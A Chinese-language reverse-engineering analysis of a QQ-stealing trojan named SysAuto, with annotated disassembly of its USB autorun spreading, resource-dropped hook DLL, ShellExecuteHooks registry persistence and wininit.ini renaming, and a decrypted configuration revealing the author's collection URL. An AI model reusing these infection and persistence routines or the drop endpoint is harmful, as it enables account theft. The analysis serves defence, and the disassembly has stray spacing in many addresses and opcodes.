SysAuto病毒简单分析(一个盗QQ木马)
首先用PEID查看是用UPX加壳,脱掉后显示为Delphi。
从文件最后读出文件大小(已加密),XOR解密后得到真正的文件大小。
下面是简单的分析过程:
将病毒文件及启动文件autorun.inf复制到E盘,然后设置文件隐藏属性
0040484C /$ 55 push ebp
0040484D |. 8BEC mov ebp,esp
0040484F |. 6A 00 push 0
00404851 |. 6A 00 push 0
00404853 |. 33C 0 xor eax,eax
00404855 |. 55 push ebp
00404856 |. 68 02494000 push SysAuto1.00404902
0040485B |. 64:FF30 push dword ptr fs:[eax]
0040485E |. 64:8920 mov dword ptr fs:[eax],esp
00404861 |. 8D55 FC lea edx,dword ptr ss:[ebp-4]
00404864 |. B8 18494000 mov eax,SysAuto1.00404918 ; ASCII "E:/"
00404869 |. E8 86FEFFFF call SysAuto 1.004046F 4
0040486E |. 68 80000000 push 80 ; /FileAttributes = NORMAL
00404873 |. 68 1C 494000 push SysAuto 1.0040491C ; |FileName = "E:/SysAuto.exe"
00404878 |. E8 BFFBFFFF call <jmp.&KERNEL32.SetFileAttributesA>; /SetFileAttributesA
0040487D |. 68 1C 494000 push SysAuto 1.0040491C ; /FileName = "E:/SysAuto.exe"
00404882 |. E8 25FBFFFF call <jmp.&KERNEL32.DeleteFileA> ; /DeleteFileA
00404887 |. 6A 00 push 0
00404889 |. 68 1C 494000 push SysAuto 1.0040491C ; ASCII "E:/SysAuto.exe"
0040488E |. 8D 55 F 8 lea edx,dword ptr ss:[ebp-8]
00404891 |. 33C 0 xor eax,eax
00404893 |. E 8 F 0E1FFFF call SysAuto 1.00402A 88
00404898 |. 8B 45 F 8 mov eax,dword ptr ss:[ebp-8]
0040489B |. E8 E4EEFFFF call SysAuto1.00403784
004048A 0 |. 50 push eax ; |ExistingFileName
004048A 1 |. E 8 F 6FAFFFF call <jmp.&KERNEL32.CopyFileA> ; /CopyFileA
004048A 6 |. BA 34494000 mov edx,SysAuto1.00404934
004048AB |. B8 98494000 mov eax,SysAuto1.00404998 ; ASCII "E:/AutoRun.Inf"
004048B0 |. E8 EB030000 call SysAuto1.00404CA0
004048B5 |. 6A 06 push 6 ; /FileAttributes = HIDDEN|SYSTEM
004048B7 |. 68 1C 494000 push SysAuto 1.0040491C ; |FileName = "E:/SysAuto.exe"
004048BC |. E8 7BFBFFFF call <jmp.&KERNEL32.SetFileAttributesA>; /SetFileAttributesA
004048C 1 |. BA B0494000 mov edx,SysAuto1.004049B0 ; ASCII "Proc"
004048C 6 |. B8 18494000 mov eax,SysAuto1.00404918 ; ASCII "E:/"
004048CB |. E8 5CFFFFFF call SysAuto 1.0040482C
004048D0 |. 68 F 4010000 push 1F 4 ; /Timeout = 500. ms
004048D5 |. E8 82FBFFFF call <jmp.&KERNEL32.Sleep> ; /Sleep
004048DA |. 8B55 FC mov edx,dword ptr ss:[ebp-4]
004048DD |. B8 18494000 mov eax,SysAuto1.00404918 ; ASCII "E:/"
004048E2 |. E8 45FFFFFF call SysAuto 1.0040482C
004048E7 |. 33C 0 xor eax,eax
004048E9 |. 5A pop edx
004048EA |. 59 pop ecx
004048EB |. 59 pop ecx
004048EC |. 64:8910 mov dword ptr fs:[eax],edx
004048EF |. 68 09494000 push SysAuto1.00404909
004048F 4 |> 8D 45 F 8 lea eax,dword ptr ss:[ebp-8]
004048F 7 |. BA 02000000 mov edx,2
004048FC |. E8 27ECFFFF call SysAuto1.00403528
00404901 /. C3 retn
创建autorun.inf文件
00404CA0 /$ 53 push ebx
00404CA1 |. 56 push esi
00404CA2 |. 57 push edi
00404CA3 |. 51 push ecx
00404CA4 |. 8BF2 mov esi,edx
00404CA6 |. 8BD8 mov ebx,eax
00404CA8 |. 33FF xor edi,edi
00404CAA |. 6A 00 push 0
00404CAC |. 6A 06 push 6
00404CAE |. 6A 02 push 2
00404CB0 |. 6A 00 push 0
00404CB2 |. 6A 03 push 3
00404CB4 |. 68 000000C 0 push C0000000
00404CB9 |. 8BC3 mov eax,ebx
00404CBB |. E 8 C 4EAFFFF call SysAuto1.00403784
00404CC0 |. 50 push eax ; |FileName
00404CC1 |. E8 DEF6FFFF call <jmp.&KERNEL32.CreateFileA> ; /CreateFileA
00404CC6 |. 8BD8 mov ebx,eax
00404CC8 |. 83FB FF cmp ebx,-1
00404CCB |. 74 2C je short SysAuto1.00404CF9
00404CCD |. 6A 00 push 0
00404CCF |. 8D4424 04 lea eax,dword ptr ss:[esp+4]
00404CD3 |. 50 push eax
00404CD4 |. 8BC6 mov eax,esi
00404CD6 |. E8 45E9FFFF call SysAuto1.00403620
00404CDB |. 50 push eax
00404CDC |. 8BC6 mov eax,esi
00404CDE |. E 8 A 1EAFFFF call SysAuto1.00403784
00404CE3 |. 50 push eax ; |Buffer
00404CE4 |. 53 push ebx ; |hFile
00404CE5 |. E8 7AF7FFFF call <jmp.&KERNEL32.WriteFile> ; /WriteFile
00404CEA |. 53 push ebx ; /hFile
00404CEB |. E8 44F 7FFFF call <jmp.&KERNEL32.SetEndOfFile> ; /SetEndOfFile
00404CF0 |. 53 push ebx ; /hObject
00404CF1 |. E8 9EF6FFFF call <jmp.&KERNEL32.CloseHandle> ; /CloseHandle
00404CF6 |. 83CF FF or edi,FFFFFFFF
00404CF9 |> 8BC7 mov eax,edi
00404CFB |. 5A pop edx
00404CFC |. 5F pop edi
00404CFD |. 5E pop esi
00404CFE |. 5B pop ebx
00404CFF /. C3 retn
向C:/Program Files/Internet Explorer/PLUGINS/复制文件System64.Sys
00405719 |. A 1 C 8604000 mov eax,dword ptr ds:[ 4060C 8]
0040571E |. 8B00 mov eax,dword ptr ds:[eax]
00405720 |. E8 5FE0FFFF call SysAuto1.00403784
00405725 |. 50 push eax
00405726 |. 8D55 D4 lea edx,dword ptr ss:[ebp -2C ]
00405729 |. A 1 C 4604000 mov eax,dword ptr ds:[ 4060C 4]
0040572E |. E8 85F 2FFFF call SysAuto1.004049B8
00405733 |. 8B45 D4 mov eax,dword ptr ss:[ebp -2C ]
00405736 |. E8 49E0FFFF call SysAuto1.00403784
0040573B |. 50 push eax ; |String1
0040573C |. E8 33EDFFFF call <jmp.&KERNEL32.lstrcmpiA> ; /lstrcmpiA
00405741 |. 85C 0 test eax,eax
00405743 |. 74 5D je short SysAuto 1.004057A 2
00405745 |. 8B0D C8604000 mov ecx,dword ptr ds:[ 4060C 8] ; SysAuto 1.004060AC
0040574B |. 8B09 mov ecx,dword ptr ds:[ecx]
0040574D |. A 1 C 8604000 mov eax,dword ptr ds:[ 4060C 8]
00405752 |. 8B 15 C 4764000 mov edx,dword ptr ds:[ 4076C 4]
00405758 |. E8 0FDFFFFF call SysAuto 1.0040366C
0040575D |. A 1 C 8604000 mov eax,dword ptr ds:[ 4060C 8]
00405762 |. 8B00 mov eax,dword ptr ds:[eax]
00405764 |. E8 1BE0FFFF call SysAuto1.00403784
00405769 |. 50 push eax ; /FileName
0040576A |. E8 3DECFFFF call <jmp.&KERNEL32.DeleteFileA> ; /DeleteFileA
0040576F |. 6A 00 push 0
00405771 |. A 1 C 8604000 mov eax,dword ptr ds:[ 4060C 8]
00405776 |. 8B00 mov eax,dword ptr ds:[eax]
00405778 |. E8 07E0FFFF call SysAuto1.00403784
0040577D |. 50 push eax
0040577E |. A 1 C 4604000 mov eax,dword ptr ds:[ 4060C 4]
00405783 |. E8 FCDFFFFF call SysAuto1.00403784
00405788 |. 50 push eax ; |ExistingFileName
00405789 |. E8 0EECFFFF call <jmp.&KERNEL32.CopyFileA> ; /CopyFileA
0040578E |. 6A 06 push 6
00405790 |. A 1 C 8604000 mov eax,dword ptr ds:[ 4060C 8]
00405795 |. 8B00 mov eax,dword ptr ds:[eax]
00405797 |. E8 E8DFFFFF call SysAuto1.00403784
0040579C |. 50 push eax ; |FileName
0040579D |. E8 9AECFFFF call <jmp.&KERNEL32.SetFileAttributes>; /SetFileAttributesA
004057A 2 |> B 8 C 0764000 mov eax,SysAuto 1.004076C 0
004057A 7 |. B9 74594000 mov ecx,SysAuto1.00405974 ; ASCII "System64.Tao"
004057AC |. 8B 15 C 4764000 mov edx,dword ptr ds:[ 4076C 4]
004057B2 |. E8 B5DEFFFF call SysAuto 1.0040366C
004057B7 |. B 8 C 8764000 mov eax,SysAuto 1.004076C 8
004057BC |. B9 8C 594000 mov ecx,SysAuto 1.0040598C ; ASCII "System64.Sys"
004057C 1 |. 8B 15 C 4764000 mov edx,dword ptr ds:[ 4076C 4]
004057C 7 |. E 8 A 0DEFFFF call SysAuto 1.0040366C
004057CC |. A 1 C 8764000 mov eax,dword ptr ds:[ 4076C 8]
004057D1 |. E8 AEDFFFFF call SysAuto1.00403784
004057D6 |. 8BD8 mov ebx,eax
004057D8 |. 53 push ebx ; /FileName = "C:/Program Files/Internet Explorer/PLUGINS/System64.Sys"
004057D9 |. E8 CEEBFFFF call <jmp.&KERNEL32.DeleteFileA> ; /DeleteFileA
004057DE |. 53 push ebx ; /Path
004057DF |. E8 44EEFFFF call <jmp.&shlwapi.PathFileExistsA> ; /PathFileExistsA
判断文件是否存在,如果不存在,从资源中取出
004057E4 |. 85C 0 test eax,eax
004057E6 |. 74 33 je short SysAuto1.0040581B
004057E8 |. A1 CC764000 mov eax,dword ptr ds:[4076CC]
004057ED |. 50 push eax
004057EE |. A 1 C 0764000 mov eax,dword ptr ds:[ 4076C 0]
004057F 3 |. E8 8CDFFFFF call SysAuto1.00403784
004057F 8 |. 8BC8 mov ecx,eax ; |
004057FA |. BA 9C 594000 mov edx,SysAuto 1.0040599C ; |ASCII "FILE"
004057FF |. B8 0A 000000 mov eax, 0A ; |
00405804 |. E8 37F 2FFFF call SysAuto 1.00404A 40 ; /SysAuto 1.00404A 40
00405809 |. 8B 15 C 0764000 mov edx,dword ptr ds:[ 4076C 0]
0040580F |. A 1 C 8764000 mov eax,dword ptr ds:[ 4076C 8]
00405814 |. E8 57F 6FFFF call SysAuto1.00404E70
00405819 |. EB 17 jmp short SysAuto1.00405832
0040581B |> A1 CC764000 mov eax,dword ptr ds:[4076CC]
00405820 |. 50 push eax ; /Arg1 => 009B02B4
00405821 |. 8BCB mov ecx,ebx ; |
00405823 |. BA 9C 594000 mov edx,SysAuto 1.0040599C ; |ASCII "FILE"
00405828 |. B8 0A 000000 mov eax, 0A ; |
0040582D |. E8 0EF2FFFF call SysAuto 1.00404A 40 ; /SysAuto 1.00404A 40
00405832 |> BA A4594000 mov edx,SysAuto 1.004059A 4 ; ASCII "yyyrt8jjjk9bjko"
00405837 |. 33C 0 xor eax,eax
00405839 |. E 8 C 2F 1FFFF call SysAuto 1.00404A 00
0040583E |. 85C 0 test eax,eax
00405840 |. 0F 85 AF000000 jnz SysAuto 1.004058F 5
00405846 |. BA B4594000 mov edx,SysAuto1.004059B4 ; ASCII "xxkxxxxjtrj8jok"
0040584B |. 33C 0 xor eax,eax
0040584D |. E8 AEF1FFFF call SysAuto 1.00404A 00
00405852 |. 85C 0 test eax,eax
00405854 |. 0F 85 9B000000 jnz SysAuto 1.004058F 5
0040585A |. 6A 00 push 0 ; /Arg8 = 00000000
0040585C |. 6A 00 push 0 ; |Arg7 = 00000000
0040585E |. 6A 00 push 0 ; |Arg6 = 00000000
00405860 |. 6A 00 push 0 ; |Arg5 = 00000000
00405862 |. 6A 00 push 0 ; |Arg4 = 00000000
00405864 |. 6A 00 push 0 ; |Arg3 = 00000000
00405866 |. A1 50764000 mov eax,dword ptr ds:[407650] ; |
0040586B |. 50 push eax ; |Arg2 => 00400000 ASCII "MZP"
0040586C |. 6A 00 push 0 ; |Arg1 = 00000000
0040586E |. BA A4594000 mov edx,SysAuto 1.004059A 4 ; |ASCII "yyyrt8jjjk9bjko"
00405873 |. B 8 C 4594000 mov eax,SysAuto 1.004059C 4 ; |ASCII "Edit"
00405878 |. 33C 9 xor ecx,ecx ; |
0040587A |. E8 7DFCFFFF call SysAuto1.004054FC ; /SysAuto1.004054FC
0040587F |. 53 push ebx ; /FileName
00405880 |. E8 87EBFFFF call <jmp.&KERNEL32.LoadLibraryA> ; /LoadLibraryA
00405885 |. 8BD8 mov ebx,eax
00405887 |. 85DB test ebx,ebx
00405889 |. 74 6A je short SysAuto 1.004058F 5
0040588B |. 68 CC594000 push SysAuto1.004059CC ; /ProcNameOrOrdinal = "MsgHookOff"
00405890 |. 53 push ebx ; |hModule
00405891 |. E8 4EEBFFFF call <jmp.&KERNEL32.GetProcAddress> ; /GetProcAddress
00405896 |. A3 D0764000 mov dword ptr ds:[4076D0],eax
0040589B |. 68 D8594000 push SysAuto1.004059D8 ; /ProcNameOrOrdinal = "MsgHookOn"
004058A 0 |. 53 push ebx ; |hModule
004058A 1 |. E8 3EEBFFFF call <jmp.&KERNEL32.GetProcAddress> ; /GetProcAddress
004058A 6 |. A3 D4764000 mov dword ptr ds:[4076D4],eax
004058AB |. 833D D0764000>cmp dword ptr ds:[4076D0],0
004058B2 |. 74 41 je short SysAuto 1.004058F 5
004058B4 |. 833D D4764000>cmp dword ptr ds:[4076D4],0
004058BB |. 74 38 je short SysAuto 1.004058F 5
004058BD |. FF15 D4764000 call dword ptr ds:[4076D4]
004058C 3 |. EB 06 jmp short SysAuto1.004058CB
004058C 5 |> 56 /push esi ; /pMsg
004058C 6 |. E 8 C 9EBFFFF |call <jmp.&user32.DispatchMessageA> ; /DispatchMessageA
004058CB |> 6A 00 push 0 ; /MsgFilterMax = 0
004058CD |. 6A 00 |push 0 ; |MsgFilterMin = 0
004058CF |. 6A 00 |push 0 ; |hWnd = NULL
004058D1 |. 56 |push esi ; |pMsg
004058D2 |. E8 D5EBFFFF |call <jmp.&user32.GetMessageA> ; /GetMessageA
004058D7 |. 85C 0 |test eax,eax
004058D9 |.^ 75 EA /jnz short SysAuto 1.004058C 5
004058DB |. FF15 D0764000 call dword ptr ds:[4076D0]
004058E1 |. 6A 00 push 0 ; /hWnd = NULL
004058E3 |. E8 9CEBFFFF call <jmp.&user32.CloseWindow> ; /CloseWindow
004058E8 |. 53 push ebx ; /hLibModule
004058E9 |. E8 CEEAFFFF call <jmp.&KERNEL32.FreeLibrary> ; /FreeLibrary
004058EE |. 6A 00 push 0 ; /hWnd = NULL
004058F 0 |. E8 8FEBFFFF call <jmp.&user32.CloseWindow> ; /CloseWindow
004058F 5 |> 68 E4594000 push SysAuto1.004059E4 ; /Arg1 = 004059E4
004058FA |. B9 E8594000 mov ecx,SysAuto1.004059E8 ; |ASCII "{754FB7D8-B8FE-4810-B363-A788CD 060F 1F }"
004058FF |. BA 105A 4000 mov edx,SysAuto 1.00405A 10 ; |ASCII "SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/ShellExecuteHooks"
00405904 |. B8 02000080 mov eax,80000002 ; |
00405909 |. E 8 F 2F 3FFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00
0040590E |. A 1 C 8764000 mov eax,dword ptr ds:[ 4076C 8]
00405913 |. E8 6CDEFFFF call SysAuto1.00403784
00405918 |. 50 push eax ; /Arg1
00405919 |. E8 42F 4FFFF call SysAuto1.00404D60 ; /SysAuto1.00404D60
0040591E |> 33C 0 xor eax,eax
00405920 |. 5A pop edx
00405921 |. 59 pop ecx
00405922 |. 59 pop ecx
00405923 |. 64:8910 mov dword ptr fs:[eax],edx
00405926 |. 68 40594000 push SysAuto1.00405940
0040592B |> 8D45 D4 lea eax,dword ptr ss:[ebp -2C ]
0040592E |. BA 07000000 mov edx,7
00405933 |. E 8 F 0DBFFFF call SysAuto1.00403528
00405938 /. C3 retn
从资源中取出system64.sys
00404A 40 /$ 55 push ebp
00404A 41 |. 8BEC mov ebp,esp
00404A 43 |. 83C 4 F 4 add esp, -0C
00404A 46 |. 53 push ebx
00404A 47 |. 56 push esi
00404A 48 |. 57 push edi
00404A 49 |. 894D FC mov dword ptr ss:[ebp-4],ecx
00404A 4C |. 8BF2 mov esi,edx
00404A 4E |. 8BD8 mov ebx,eax
00404A 50 |. 837D 08 00 cmp dword ptr ss:[ebp+8],0
00404A 54 |. 0F 84 B3000000 je SysAuto1.00404B0D
00404A 5A |. 53 push ebx ; /ResourceType
00404A 5B |. 56 push esi ; |ResourceName
00404A 5C |. A1 50764000 mov eax,dword ptr ds:[407650] ; |
00404A 61 |. 50 push eax ; |hModule => 00400000 (SysAuto1)
00404A 62 |. E8 4DF9FFFF call <jmp.&KERNEL32.FindResourc>; /FindResourceA
00404A 67 |. 8BF8 mov edi,eax ; SysAuto 1.0040C 080
00404A 69 |. 85FF test edi,edi
00404A 6B |. 0F 84 9C 000000 je SysAuto1.00404B0D
00404A 71 |. 57 push edi ; /hResource
00404A 72 |. A1 50764000 mov eax,dword ptr ds:[407650] ; |
00404A 77 |. 50 push eax ; |hModule => 00400000 (SysAuto1)
00404A 78 |. E8 97F 9FFFF call <jmp.&KERNEL32.LoadResourc>; /LoadResource
00404A 7D |. 8BF0 mov esi,eax
00404A 7F |. 85F 6 test esi,esi
00404A 81 |. 0F 84 86000000 je SysAuto1.00404B0D
00404A 87 |. 56 push esi ; /hResource
00404A 88 |. E8 8FF9FFFF call <jmp.&KERNEL32.LockResourc>; /LockResource
00404A 8D |. 8945 F 4 mov dword ptr ss:[ebp-C],eax
00404A 90 |. 837D F4 00 cmp dword ptr ss:[ebp-C],0
00404A 94 |. 74 77 je short SysAuto1.00404B0D
00404A 96 |. 6A 00 push 0 ; /hTemplateFile = NULL
00404A 98 |. 6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00404A 9A |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00404A 9C |. 6A 00 push 0 ; |pSecurity = NULL
00404A 9E |. 6A 00 push 0 ; |ShareMode = 0
00404AA0 |. 68 000000C 0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00404AA5 |. 8B45 FC mov eax,dword ptr ss:[ebp-4] ; |
00404AA8 |. 50 push eax ; |FileName
00404AA9 |. E 8 F 6F 8FFFF call <jmp.&KERNEL32.CreateFileA>; /CreateFileA
00404AAE |. 8BD8 mov ebx,eax
00404AB0 |. 83FB FF cmp ebx,-1
00404AB3 |. 74 58 je short SysAuto1.00404B0D
00404AB5 |. 57 push edi ; /hResource
00404AB6 |. A1 50764000 mov eax,dword ptr ds:[407650] ; |
00404ABB |. 50 push eax ; |hModule => 00400000 (SysAuto1)
00404ABC |. E8 93F 9FFFF call <jmp.&KERNEL32.SizeofResou>; /SizeofResource
00404AC 1 |. 8BF8 mov edi,eax
00404AC 3 |. 6A 00 push 0 ; /pOverlapped = NULL
00404AC 5 |. 8D 45 F 8 lea eax,dword ptr ss:[ebp-8] ; |
00404AC 8 |. 50 push eax ; |pBytesWritten
00404AC 9 |. 57 push edi ; |nBytesToWrite
00404ACA |. 8B 45 F 4 mov eax,dword ptr ss:[ebp-C] ; |
00404ACD |. 50 push eax ; |Buffer
00404ACE |. 53 push ebx ; |hFile
00404ACF |. E8 90F 9FFFF call <jmp.&KERNEL32.WriteFile> ; /WriteFile
00404AD4 |. 8B45 08 mov eax,dword ptr ss:[ebp+8]
00404AD7 |. E8 44EBFFFF call SysAuto1.00403620
00404ADC |. 8BF8 mov edi,eax
00404ADE |. 6A 00 push 0
00404AE0 |. 8D 45 F 8 lea eax,dword ptr ss:[ebp-8]
00404AE3 |. 50 push eax
00404AE4 |. 57 push edi
00404AE5 |. 8B45 08 mov eax,dword ptr ss:[ebp+8]
00404AE8 |. E8 97ECFFFF call SysAuto1.00403784
00404AED |. 50 push eax ; |Buffer
00404AEE |. 53 push ebx ; |hFile
00404AEF |. E8 70F 9FFFF call <jmp.&KERNEL32.WriteFile> ; /WriteFile
00404AF4 |. 53 push ebx ; /hFile
00404AF5 |. E8 3AF9FFFF call <jmp.&KERNEL32.SetEndOfFil>; /SetEndOfFile
00404AFA |. 53 push ebx ; /hObject
00404AFB |. E8 94F 8FFFF call <jmp.&KERNEL32.CloseHandle>; /CloseHandle
00404B00 |. 8BC6 mov eax,esi
00404B02 |. E8 B 5F 9FFFF call SysAuto1.004044BC
00404B07 |. 56 push esi ; /hResource
00404B08 |. E8 B 7F 8FFFF call <jmp.&KERNEL32.FreeResourc>; /FreeResource
00404B0D |> 5F pop edi
00404B0E |. 5E pop esi
00404B 0F |. 5B pop ebx
00404B10 |. 8BE5 mov esp,ebp
00404B12 |. 5D pop ebp
00404B13 /. C2 0400 retn 4
修改注册表进行文件启动
00404D00 /$ 55 push ebp
00404D01 |. 8BEC mov ebp,esp
00404D03 |. 83C 4 F 8 add esp,-8
00404D06 |. 53 push ebx
00404D07 |. 56 push esi
00404D08 |. 8BF1 mov esi,ecx
00404D 0A |. 8B5D 08 mov ebx,dword ptr ss:[ebp+8]
00404D0D |. 33C 9 xor ecx,ecx
00404D 0F |. 894D FC mov dword ptr ss:[ebp-4],ecx
00404D12 |. C 745 F 8 01000>mov dword ptr ss:[ebp-8],1
00404D19 |. 8D4D F8 lea ecx,dword ptr ss:[ebp-8]
00404D 1C |. 51 push ecx ; /pDisposition
00404D1D |. 8D4D FC lea ecx,dword ptr ss:[ebp-4] ; |
00404D20 |. 51 push ecx ; |pHandle
00404D21 |. 6A 00 push 0 ; |pSecurity = NULL
00404D23 |. 68 3F 000F 00 push 0F 003F ; |Access = KEY_ALL_ACCESS
00404D28 |. 6A 00 push 0 ; |Options = REG_OPTION_NON_VOLATILE
00404D 2A |. 6A 00 push 0 ; |Class = NULL
00404D 2C |. 6A 00 push 0 ; |Reserved = 0
00404D2E |. 52 push edx ; |Subkey
00404D 2F |. 50 push eax ; |hKey
00404D30 |. E8 4FF6FFFF call <jmp.&advapi32.RegCreateKe>; /RegCreateKeyExA
00404D35 |. 53 push ebx ; /String = ""
00404D36 |. E8 41F 7FFFF call <jmp.&KERNEL32.lstrlenA> ; /lstrlenA
00404D3B |. 40 inc eax
00404D 3C |. 50 push eax ; /BufSize
00404D3D |. 53 push ebx ; |Buffer
00404D3E |. 6A 01 push 1 ; |ValueType = REG_SZ
00404D40 |. 6A 00 push 0 ; |Reserved = 0
00404D42 |. 56 push esi ; |ValueName
00404D43 |. 8B45 FC mov eax,dword ptr ss:[ebp-4] ; |
00404D46 |. 50 push eax ; |hKey
00404D47 |. E8 40F 6FFFF call <jmp.&advapi32.RegSetValue>; /RegSetValueExA
00404D 4C |. 8B45 FC mov eax,dword ptr ss:[ebp-4]
00404D 4F |. 50 push eax ; /hKey
00404D50 |. E8 27F 6FFFF call <jmp.&advapi32.RegCloseKey>; /RegCloseKey
00404D55 |. 5E pop esi
00404D56 |. 5B pop ebx
00404D57 |. 59 pop ecx
00404D58 |. 59 pop ecx
00404D59 |. 5D pop ebp
00404D 5A /. C2 0400 retn 4
00404D5D 8D40 00 lea eax,dword ptr ds:[eax]
00404D60 /$ 55 push ebp
00404D61 |. 8BEC mov ebp,esp
00404D63 |. 53 push ebx
00404D64 |. BB 84764000 mov ebx,SysAuto1.00407684
00404D69 |. 8BC3 mov eax,ebx
00404D6B |. BA E44D4000 mov edx,SysAuto1.00404DE4 ; ASCII "CLSID/{754FB7D8-B8FE-4810-B363-A788CD 060F 1F }"
00404D70 |. E8 E3E7FFFF call SysAuto1.00403558
00404D75 |. 68 144E4000 push SysAuto1.00404E14
00404D 7A |. 8B03 mov eax,dword ptr ds:[ebx]
00404D 7C |. E8 03EAFFFF call SysAuto1.00403784
00404D81 |. 8BD0 mov edx,eax ; |
00404D83 |. B9 144E4000 mov ecx,SysAuto1.00404E14 ; |
00404D88 |. B8 00000080 mov eax,80000000 ; |
00404D8D |. E8 6EFFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00
00404D92 |. 8BC3 mov eax,ebx
00404D94 |. BA 204E4000 mov edx,SysAuto1.00404E20 ; ASCII "/InProcServer32"
00404D99 |. E8 8AE8FFFF call SysAuto1.00403628
00404D9E |. 8B45 08 mov eax,dword ptr ss:[ebp+8]
00404DA1 |. 50 push eax
00404DA2 |. 8B03 mov eax,dword ptr ds:[ebx]
00404DA4 |. E8 DBE9FFFF call SysAuto1.00403784
00404DA9 |. 8BD0 mov edx,eax ; |
00404DAB |. B9 144E4000 mov ecx,SysAuto1.00404E14 ; |
00404DB0 |. B8 00000080 mov eax,80000000 ; |
00404DB5 |. E8 46FFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00
00404DBA |. 68 304E4000 push SysAuto1.00404E30 ; ASCII "Apartment"
00404DBF |. 8B03 mov eax,dword ptr ds:[ebx]
00404DC1 |. E8 BEE9FFFF call SysAuto1.00403784
00404DC6 |. 8BD0 mov edx,eax ; |
00404DC8 |. B9 3C 4E4000 mov ecx,SysAuto1.00404E 3C ; |ASCII "ThreadingModel"
00404DCD |. B8 00000080 mov eax,80000000 ; |
00404DD2 |. E8 29FFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00
00404DD7 |. 5B pop ebx
00404DD8 |. 5D pop ebp
00404DD9 /. C2 0400 retn 4
根据操作系统版本修改wininit.ini的内容
00404E 4C /$ 81C 4 6CFFFFFF add esp,-94
00404E52 |. C70424 940000>mov dword ptr ss:[esp],94
00404E59 |. 54 push esp ; /pVersionInformation
00404E 5A |. E8 9DF5FFFF call <jmp.&KERNEL32.GetVersionE>; /GetVersionExA
00404E 5F |. 837C 24 10 02 cmp dword ptr ss:[esp+10],2
00404E64 |. 0F 95C 0 setne al
00404E67 |. 81C 4 94000000 add esp,94
00404E6D /. C3 retn
00404E6E 8BC0 mov eax,eax
00404E70 /$ 53 push ebx
00404E71 |. 56 push esi
00404E72 |. 81C 4 F 4FDFFFF add esp, -20C
00404E78 |. 8BF2 mov esi,edx
00404E 7A |. 8BD8 mov ebx,eax
00404E 7C |. E8 CBFFFFFF call SysAuto1.00404E 4C
00404E81 |. 84C 0 test al,al
00404E83 |. 74 4F je short SysAuto1.00404ED4
00404E85 |. 68 04010000 push 104
00404E 8A |. 8D8424 090100>lea eax,dword ptr ss:[esp+109]
00404E91 |. 50 push eax
00404E92 |. 8BC6 mov eax,esi
00404E94 |. E8 EBE8FFFF call SysAuto1.00403784
00404E99 |. 50 push eax ; |LongPath
00404E 9A |. E8 4DF5FFFF call <jmp.&KERNEL32.GetShortPat>; /GetShortPathNameA
00404E 9F |. 68 04010000 push 104
00404EA4 |. 8D4424 04 lea eax,dword ptr ss:[esp+4]
00404EA8 |. 50 push eax
00404EA9 |. 8BC3 mov eax,ebx
00404EAB |. E8 D4E8FFFF call SysAuto1.00403784
00404EB0 |. 50 push eax ; |LongPath
00404EB1 |. E8 36F 5FFFF call <jmp.&KERNEL32.GetShortPat>; /GetShortPathNameA
00404EB6 |. 68 F 44E4000 push SysAuto1.00404EF4 ; /FileName = "wininit.ini"
00404EBB |. 8D8424 090100>lea eax,dword ptr ss:[esp+109] ; |
00404EC2 |. 50 push eax ; |String
00404EC3 |. 8D4424 08 lea eax,dword ptr ss:[esp+8] ; |
00404EC7 |. 50 push eax ; |Key
00404EC8 |. 68 004F 4000 push SysAuto 1.00404F 00 ; |Section = "rename"
00404ECD |. E8 9AF5FFFF call <jmp.&KERNEL32.WritePrivat>; /WritePrivateProfileStringA
00404ED2 |. EB 17 jmp short SysAuto1.00404EEB
00404ED4 |> 6A 05 push 5
00404ED6 |. 8BC3 mov eax,ebx
00404ED8 |. E 8 A 7E8FFFF call SysAuto1.00403784
00404EDD |. 50 push eax
00404EDE |. 8BC6 mov eax,esi
00404EE0 |. E8 9FE8FFFF call SysAuto1.00403784
00404EE5 |. 50 push eax ; |ExistingName
00404EE6 |. E8 39F 5FFFF call <jmp.&KERNEL32.MoveFileExA>; /MoveFileExA
00404EEB |> 81C 4 0C 020000 add esp, 20C
00404EF1 |. 5E pop esi
00404EF2 |. 5B pop ebx
00404EF3 /. C3 retn
中间还有一段是解密作者隐藏的数据,下面是解密出的数据
解密出病毒作者的网址及其他数据
009B 002F 00 CB FB B 4 F 3 D2 AF 0D 0A 32 30 30 他大爷..200
009B 003F 37 2D 36 2D 39 20 31 35 3A 32 34 3A 32 36 0D 0A 7-6-9 15:24:26..
009B 004F 36 34 32 43 32 42 33 35 0D 0A 4B 65 79 5F 4B 65 642C 2B35..Key_Ke
009B 005F 79 0D 0A 36 30 0D 0A 59 65 73 0D 0A 59 65 73 0D y..60..Yes..Yes.
009B 006F 0A 59 65 73 0D 0A 68 74 74 70 3A 2F 2F 77 77 77 .Yes..http://www
009B 007F 2E 70 6C 69 6E 63 65 2E 6E 65 74 2F 58 58 2F 6E .plince.net/XX/n
009B 008F 6E 2E 61 73 70 0D 0A 78 78 78 78 0D 0A 68 74 74 n.asp..xxxx..htt
009B 009F 70 3A 2F 2F 77 77 77 2E 70 6C 69 6E 63 65 2E 6E p://www.plince.n
009B00AF 65 74 2F 58 58 2F 6E 6E 2E 61 73 70 0D 0A 17 E3 et/XX/nn.asp..
www.plince.net/XX/nn.asp